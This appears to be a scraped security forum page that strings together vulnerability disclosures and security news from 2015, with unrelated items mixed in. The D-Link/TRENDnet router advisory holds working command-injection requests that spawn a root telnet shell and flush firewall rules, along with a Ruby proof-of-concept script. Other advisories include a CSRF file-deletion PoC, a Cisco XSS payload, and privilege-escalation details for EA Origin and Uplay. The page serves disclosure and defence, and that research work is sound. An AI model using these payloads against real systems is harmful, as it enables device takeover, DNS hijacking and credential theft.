Aerosol

>> D-Link and TRENDnet 'ncc2' service - multiple vulnerabilities Discovered by: ---- Peter Adkins <peter.adkins@kernelpicnic.net> Access: ---- Local network; unauthenticated access. Remote network; unauthenticated access*. Remote network; 'drive-by' via CSRF. Tracking and identifiers: ---- CVE - Mitre contacted; not yet allocated. Platforms / Firmware confirmed affected: ---- D-Link DIR-820L (Rev A) - v1.02B10 D-Link DIR-820L (Rev A) - v1.05B03 D-Link DIR-820L (Rev - v2.01b02 TRENDnet TEW-731BR (Rev 2) - v2.01b01 Additional platforms believed to be affected: ---- D-Link DIR-808L (Rev A) - v1.03b05 D-Link DIR-810L (Rev A) - v1.01b04 D-Link DIR-810L (Rev - v2.02b01 D-Link DIR-826L (Rev A) - v1.00b23 D-Link DIR-830L (Rev A) - v1.00b07 D-Link DIR-836L (Rev A) - v1.01b03 Vendor involvement: ---- 2015-01-11 - Issues reported to D-Link via email (security contact). 2015-01-11 - Issues reported to TRENDnet via support ticket. 2015-01-12 - Initial response from TRENDnet. 2015-01-14 - Initial response from D-Link (security contact). 2015-01-19 - Email to Mitre. 2015-01-19 - TRENDnet request a few days to validate vulnerabilities. 2015-01-26 - TRENDnet confirm vulnerabilities and commit to Feb 10 fix. 2015-02-01 - Initial response from Mitre. 2015-02-04 - Requested an update from D-Link (security contact). 2015-02-10 - TRENDnet release 2.02b01 resolving vulnerabilities. 2015-02-10 - Emailed Mitre requesting follow up. 2015-02-10 - Emailed D-Link requesting follow up (security contact). 2015-02-18 - Emailed D-Link requesting follow up (security contact). 2015-02-21 - Contacted D-Link support as I had not still not heard back. 2015-02-22 - D-Link support were unsure as to my query. 2015-02-22 - Replied to D-Link support clarifying my request. 2015-02-23 - D-Link support directed me to the security reporting guide. 2015-02-26 - Vulnerability published to Bugtraq and GitHub. Mitigation: ---- * Ensure remote / WAN management is disabled on the affected devices. * Only allow trusted devices access to the local network. * If using a listed TRENDnet device, install the patched firmware issued by the vendor. * If using a listed D-Link device, you'll need to use a third party tool such as µBlock (Chrome, Firefox and Safari) to blacklist requests to your router. This isn't ideal, but it's better than the alternative. Notes: ---- * Due to the nature of the the 'ping.ccp' vulnerability, an attacker can gain root access, hijack DNS settings or execute arbitrary commands on these devices with the user simply visiting a web page with a malicious HTTP form embedded (via CSRF). * Due to the location of this issue (ncc / ncc2) these vulnerabilities may be present in other devices and firmware versions not listed in this document. * D-Link initially responded on their security contact within a week. However, after I had provided write ups of these vulnerabilities it went quiet. In over a month I have been unable to get any sort of response from D-Link, including as to whether they have managed to replicate these issues or when there will be a fix. I contacted D-Link support as a last ditch effort to reestablish contact, however I was linked back to the same security reporting process I had followed initially. * Remote execution of these exploits is possible, but requires the device to already have remote / WAN management enabled; except in the case of 'ping.ccp', as above. * If you have a D-Link device that is believed to be affected and can confirm whether the PoC is successful, please let me know and I will update the copy of this document on GitHub (see below) and provide credit for your findings. * A copy of this document, as well as the proof of concept below and a more detailed write-up has been made available via GitHub: * https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2 ---- fwupgrade.ccp ---- The ncc / ncc2 service on the affected devices allows for basic firmware and language file upgrades via the web interface. During the operation, a HTTP POST is submitted to a resource named 'fwupgrade.ccp'. The request appears to be executed by the ncc / ncc2 service on the device, which runs as the root user. Unfortunately, the filtering on this resource does not appear to be effective, as: file / MIME type filtering is not being performed; and the 'on-failure' redirection to the login page is being performed AFTER a file has already been written the the filesystem in full. As a result of the above, this resource can be used to upload files to the filesystem of devices running vulnerable versions of ncc / ncc2 without authentication. This is also possible over the internet if WAN / remote management has been previously enabled on the device. To compound the issue, at least in the case of the listed devices, files are written to a ramfs filesystem which is mounted at '/var/tmp'. This becomes an issue as this directory is also used to store volatile system configuration files - as the root filesystem is mounted read-only. The files under '/var/tmp' include 'resolv.conf', allowing for an attacker to hijack a user's DNS configuration: # Overwrite the DNS resolver with Google DNS echo 'nameserver 8.8.8.8' > resolv.conf curl \ -i http://192.168.0.1/fwupgrade.ccp \ -F action=fwupgrade \ -F filename=resolv.conf \ -F file=@resolv.conf ---- ping.ccp ---- The ncc / ncc2 service on the affected devices allow for basic 'ping' diagnostics to be performed via the 'ping.ccp' resource. Unfortunately, it appears that strings passed to this call are not correctly sanitized. Much in the same manner as above, the request appears to be executed by the ncc / ncc2 service on the device, which is run as the root user. The handler for 'ping_v4' does not appear to be vulnerable as this resource maps the components of a IPv4 address, represented by a dotted quad, into a format of '%u.%u.%u.%u' at execution time. However, 'ping_ipv6' references the user provided input directly as a string ('%s'), which is then passed to a system() call. This formatting allows for an attacker to pass arbitrary commands to the device through a HTTP request. As this resource is also able to be accessed without authentication, it provides a vector for an attacker to execute arbitrary commands on the device - including, but not limited to, DNS hijacking and WAN firewall disablement - via CSRF. # Spawn a root shell (telnet) curl \ -i http://192.168.0.1/ping.ccp \ --data 'ccp_act=ping_v6&ping_addr=$(telnetd -l /bin/sh)' # Flush the iptables INPUT chain and set the default policy to ACCEPT. curl \ -i http://192.168.0.1/ping.ccp \ --data 'ccp_act=ping_v6&ping_addr=$(iptables -P INPUT ACCEPT)' curl \ -i http://192.168.0.1/ping.ccp \ --data 'ccp_act=ping_v6&ping_addr=$(iptables -F INPUT)' ---- UDPServer / MP Daemon ---- Note: This vulnerability does not seem to be present in firmware versions before 1.05B03 on the DIR-820LA1. This may differ on other platforms. The ncc / ncc2 service on the affected devices appears to have been shipped with a number of diagnostic hooks available. Unfortunately, much in the same manner as the vulnerabilities discussed above, these hooks are able to be called without authentication. These hooks are also callable via CSRF; although a moot point given that the 'ping.ccp' vulnerability discussed above already yields a higher level of access to the device via the same manner. One of the more 'interesting' hooks exposed by these devices allow for a 'UDPServer' process to be spawned on the device when called. When started this process listens on the devices LAN IP for data on UDP 9034. Unfortunately, this process does not appear to perform any sort of input sanitization before passing user input to a system() call. Further investigation finds that the source for this service (UDPServer) is available in the RealTek SDK, and appears to be a diagnostic tool. As a result of the above, this process is vulnerable to arbitrary command injection. # Spawn a root shell (telnet) curl -i 192.168.0.1/test_mode.txt echo "\`telnetd -l /bin/sh\`" > /dev/udp/192.168.0.1/9034 ---- Diagnostic hooks ---- Further to the 'test_mode' hook discussed above, the ncc / ncc2 service on the affected devices appear to have been shipped with a number of other diagnostic hooks enabled by default: * tftpd_ready.txt * chklst.txt * wps_default_pin.txt * usb_connect.txt * wps_btn.txt * reset_btn.txt * reboot_btn.txt * calibration_ready24G.txt * calibration_ready5G.txt * restore_default_finish.txt * set_mac_finish.txt * test_mode.txt * wifist.txt These resources do not exist on the filesystem of the device, nor do they appear to be static. Instead, these files appear to be rendered when queried and can be used to both interrogate the given device for information, as well as enable diagnostic services on demand. Unfortunately, these hooks are able to be queried without any form of authentication, and are accessible by attackers on the local network, and over the internet via WAN management (if enabled), and CSRF. A brief descriptions for each of these hooks is provided below. Those not listed provide either unknown functionality, or binary values which appear to represent system GPIO states (*_btn.txt). - tftp_ready.txt When queried, this resource spawns a tftp daemon which has a root directory of '/'. As TFTP requires no authentication, this service can be used to extract credentials from the device or even download files from an external storage device connected via USB. Unfortunately, due to the way this data is stored on the system, all credentials appear to be available in plain-text. These credentials can include (depending on the vendor and device configuration): * GUI / Device management credentials * Samba credentials * PPPoE credentials * Email credentials * 'MyDlink' credentials (on D-Link devices) - chklst.txt When queried, this resource will return the following information: * Current WLAN SSIDs * Current WLAN channels * LAN and WAN MAC addressing * Current Firmware version information * Hardware version information * Language information - wps_default_pin.txt When queried, this resource will return the default / factory WPS pin for the device. - usb_connect.txt When queried, this resource will return a binary value which indicates whether an external device is connected to the USB port on the device - or null in the case of devices that do not have an exposed USB port. This resource could potentially by used by an attacker to enumerate devices with USB storage attached. ---- Ruby PoC ---- # NCC2 PoC. require 'pp' require 'optparse' require 'restclient' # Set defaults and parse command line arguments options = {} options[:addr] = "192.168.0.1" options[:port] = 80 OptionParser.new do |option| option.on("--address [ADDRESS]", "Destination hostname or IP") do |a| options[:addr] = a end option.on("--port [PORT]", "Destination TCP port") do |p| options[:port] = p end option.parse! end # Define which SOAPActions we will be using. actions = [ { :name => "Get device information", :call => "sloppy_parser", :path => "chklst.txt", }, { :name => "Has USB device connected", :call => "txt_parser", :path => "usb_connect.txt", }, { :name => "Get WPS default pin", :call => "txt_parser", :path => "wps_default_pin.txt", }, { :name => "Enable UDPServer", :call => "noop", :path => "test_mode.txt", }, { :name => "Enable TFTP service", :call => "noop", :path => "tftpd_ready.txt", }, { :name => "Enable telnet (root)", :call => "noop", :path => "ping.ccp", :post => { "ccp_act" => "ping_v6", "ping_addr" => "$(telnetd -l /bin/sh)" } } ] def noop(val) return end def sloppy_parser(slop) slop.split(/\<br \/\>/).each do |l| puts " #{l}" end end def txt_parser(txt) l = txt.gsub(/\=/, ': ') puts " #{l}" end # Iterate over all actions and attempt to execute. url = "http://#{options[:addr]}:#{options[:port]}" puts "[!] Attempting to extract information from #{url}" actions.each do |action| # Build the target URL and setup the HTTP client object. request = RestClient::Resource.new("#{url}/#{action[:path]}") # Fire the request and ensure a 200 OKAY. begin if action[:post] response = request.post(action[:post]) else response = request.get() end rescue puts "[!] Failed to query remote host." abort end if response.code != 200 puts "[-] '#{action[:name]}' failed with response: #{response.code}" next end # Send to the processor. puts "[*] #{action[:name]} request succeeded." send(action[:call], response.body()) end Source

Document Title: =============== Wireless File Transfer Pro Android - CSRF Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1437 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1437 Common Vulnerability Scoring System: ==================================== 2.3 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Lextel Technology Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple cross site request forgery issues has been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Create New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

? Electronic Arts Origin Client 9.5.5 Multiple Privilege Escalation Vulnerabilities Vendor: Electronic Arts Inc. Product web page: https://www.origin.com Affected version: 9.5.5.2850 (353317) 9.5.3.636 (350385) 9.5.2.2829 (348065) Summary: Origin (formerly EA Download Manager (EADM)) is digital distribution software from Electronic Arts that allows users to purchase games on the internet for PC and mobile platforms, and download them with the Origin client (formerly EA Download Manager, EA Downloader and EA Link). Desc#1: The application is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (full) for the 'Everyone' and 'Users' group, for the 'OriginClientService.exe' binary file, and for all the files in the 'Origin' directory. The service is installed by default to start on system boot with LocalSystem privileges. Attackers can replace the binary with their rootkit, and on reboot they get SYSTEM privileges. Desc#2: Origin client service also suffers from an unquoted search path issue impacting the 'Origin Client Service' service for Windows deployed as part of the Origin Thin Setup bundle. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. Tested on: Microsoft Windows 7 Professional SP1 (EN) Microsoft Windows 7 Ultimate SP1 (EN) Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5231 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5231.php[/url] 14.12.2014 ************************************************************************** C:\>sc qc "Origin Client Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Origin Client Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Origin\OriginClientService.exe <-----< Unquoted path LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Origin Client Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>cacls "C:\Program Files (x86)\Origin\OriginClientService.exe" c:\Program Files (x86)\Origin\OriginClientService.exe Everyone:(ID)F <-----< Full control BUILTIN\Users:(ID)F <-----< Full control NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F C:\> ************************************************************************** ************************************************************************** C:\>cscript XCACLS.vbs "C:\Program Files (x86)\Origin\*.exe" Microsoft (R) Windows Script Host Version 5.8 Copyright (C) Microsoft Corporation. All rights reserved. Starting XCACLS.VBS (Version: 5.2) Script at 15.12.2014 19:46:41 Startup directory: "C:\" Arguments Used: Filename = "C:\Program Files (x86)\Origin\*.exe" ************************************************************************** File: C:\Program Files (x86)\Origin\EAProxyInstaller.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\igoproxy64.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\Origin.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\OriginClientService.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\OriginCrashReporter.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\OriginER.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** ************************************************************************** File: C:\Program Files (x86)\Origin\OriginUninstall.exe Permissions: Type Username Permissions Inheritance Allowed \Everyone Full Control This Folder Only Allowed BUILTIN\Users Full Control This Folder Only Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only Allowed BUILTIN\Administrators Full Control This Folder Only No Auditing set Owner: BUILTIN\Administrators ************************************************************************** Operation Complete Elapsed Time: 0,1796875 seconds. Ending Script at 15.12.2014 19:46:41 C:\> ************************************************************************** -- ************************************************************************** Changed permissions and service binary path name (vendor fix): -------------------------------------------------------------- C:\>sc qc "Origin Client Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Origin Client Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Origin\OriginClientService.exe" <-----< Quoted path LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Origin Client Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>icacls "C:\Program Files (x86)\Origin\OriginClientService.exe" C:\Program Files (x86)\Origin\OriginClientService.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) <-----< Read and execute Successfully processed 1 files; Failed processing 0 files C:\> ************************************************************************** Source

Mie unul imi place ideea, chat-ul e destul de ok + muzica buna! Bafta cu proiectul.

Technology that allows a drone to be piloted from the ground using only a person's brainwaves has been demonstrated in Portugal. The company behind the development, Tekever, said the technology could in the short term be used to enable people with restricted movement to control aircraft. Longer term the firm said piloting of larger jets, such as cargo planes, could be controlled in this way without the need for a crew on board. However, one aviation expert told the BBC he thought the industry would be unlikely to adopt such technology due to a perception of being potentially unsafe. 'Everyday activity' Drone specialist Tekever, which works with security firms, police forces and the military, adapted existing Electroencephalography (EEG) technology so it could issue instructions to the software used to give the unmanned drone instructions. EEG works by detecting activity in specific parts of the brain. After several months of training, "pilots" are said to be able to teach their brain how to think about moving a small circle on a computer screen either up or down, which in turn steers the drone left or right. "We believe people will be able to pilot aircraft just like they perform everyday activities like walking or running," said Ricardo Mendes, Tekever's chief operating officer. "We truly believe that Brainflight represents the beginning of a tremendous step change in the aviation field, empowering pilots and de-risking missions, and we're looking forward to deliver these benefits to the market with highly innovative products." 'Bridge too far' In the future, some of this technology may be put to use to control much larger aircraft, although Mr Mendes acknowledged considerable challenges with both regulatory hurdles and public confidence. Those concerns were echoed by John Strickland, an independent aviation consultant based in London. "This to me is certainly at the moment a bridge too far," he told the BBC. "You could get someone radically-minded who might say it, but I'd be surprised if anyone would do it." Mr Strickland said the airline industry was instead focusing its innovation efforts towards things like better materials and more economical engines. Mr Mendes said the technology would incorporate safety measures to counteract the effects of someone having, for example, a seizure while piloting. "There are algorithms on board that prevent bad things from happening," he told the BBC. He added: "Technology is evolving, regulations are evolving. [unmanned jets are] obviously going to happen. The question is not if, it's when." Video + Sursa: HERE

The U.S. Department of State's Transnational Organized Crime Rewards Program has put a $3 million bounty on Russian hacker Evgeniy Mikhailovich Bogachev for a number of cyber crimes he allegedly committed using Zeus malware. This is the largest bounty the U.S. has offered for information on a cybercriminal. The FBI had launched an investigation into Bogachev's activities and a notice on the Transnational Organized Crime Rewards Program page said it wants the cybercriminal, who went by the online names of lucky12345 and slavik, “for his alleged involvement in a wide-ranging racketeering enterprise that installed, without authorisation, malicious software known as ‘Zeus' on victims' computers." The agency and others have stepped up efforts to nab those behind Zeus and GameOver Zeus. The reward will be paid for information that leads to the arrest and/or conviction of Bogachev, who is believed to be living in Russia. Source

Euro cybercrime cops have taken down the RAMNIT botnet, which has infected 3.2 million computers worldwide, including 33,000 in the UK. The National Crime Agency's cybercrime unit worked with cops in the Netherlands, Italy and Germany to shut down command-and-control servers used by the botnet. One of the servers was housed in Gosport, Hampshire. RAMNIT spread malware via innocuous-looking links sent in phishing emails or social networking websites, and has mainly been used to take money from bank accounts from people running Windows OSes. Europol was alerted to RAMNIT by Microsoft, after data analysis showed a big increase in infections. The operation to take down RAMNIT was co-ordinated by the Joint Cybercrime Action Taskforce based at Europol’s European Cybercrime Centre. “This malware effectively gives criminals a back door so they can take control of your computer, access your images, passwords or personal data and even use it to circulate further spam messages or launch illegal attacks on other websites," said Steve Pye of the NCA’s national cybercrime Unit. “As a result of this action, the UK is safer from RAMNIT, but it is important that individuals take action now to disinfect their machines, and protect their personal information," he added. The NCA is advising people to check whether their computer has been infected by downloading specialist disinfection software, which is available free of charge at CyberStreetWise or GetSafeOnline. Analysis is now taking place on the servers and an investigation is ongoing, said the NCA source

More than one million websites that run on the WordPress content management application run the risk of being completely hijacked by attackers exploiting critical vulnerability in most versions of a plugin called WP-Slimstat. Versions prior to the recently released Slimstat 3.9.6 contain a readily guessable key that's used to sign data sent to and from visiting end-user computers, according to a blog post published Tuesday by Web security firm Sucuri. The result is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites. "If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote. "Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)." The WP-Slimstat secret key is nothing more than the MD5 hash of the plugin’s installation timestamp. An attacker could use the Internet Archive or similar sites to determine the year a vulnerable site was put online. That would leave an attacker with about 30 million values to test, an undertaking that could be completed in about 10 minutes. Once the secret key has been divined, the attacker can use it to pull data out of the database. WP-Slimstat is an analytics tool. Its listing on WordPress shows it has been downloaded more than 1.3 million times. People who operate websites that use the plugin should update immediately. Post updated to change headline. It previously read: More than1 million WordPress websites imperiled by critical plugin bug. Source

Summary: 1. Thanks for the sample file(s) 2. First view 3. Second view 4. More Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf

Cisco Ironport AsyncOS Cross Site Scripting Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-022 Cisco Ironport SMA - AsyncOS 8.4.0-126 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2013-6780 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated Cross-site scripting (XSS), caused by improper validation of user supplied input in the (uploader.swf) Uploader component in Yahoo! versions 2.5.0 through 2.9.0. An attacker is able to inject arbitrary web script or HTML via the allowedDomain parameter. XSS Payload: http(s)://domain.com/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert('XSS');}// References: https://tools.cisco.com/bugsearch/bug/CSCur44409 https://tools.cisco.com/bugsearch/bug/CSCur89626 https://tools.cisco.com/bugsearch/bug/CSCur89624 http://yuilibrary.com/support/20131111-vulnerability/ http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6780 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6780 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE----- Source

Ubisoft Uplay 5.0 Insecure File Permissions Local Privilege Escalation Vendor: Ubisoft Entertainment S.A. Product web page: http://www.ubi.com Affected version: 5.0.0.3914 (PC) Summary: Uplay is a digital distribution, digital rights management, multiplayer and communications service created by Ubisoft to provide an experience similar to the achievements/trophies offered by various other game companies. - Uplay PC is a desktop client which replaces individual game launchers previously used for Ubisoft games. With Uplay PC, you have all your Uplay enabled games and Uplay services in the same place and you get access to a whole new set of features for your PC games. Desc: Uplay for PC suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Users' group, making the entire directory 'Ubisoft Game Launcher' and its files and sub-dirs world-writable. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5230 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php[/url] Vendor: [url]http://forums.ubi.com/forumdisplay.php/513-Uplay[/url] 19.02.2015 -- C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>cacls Uplay.exe C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\Uplay.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F test-PC\yousir:(ID)F C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher> source

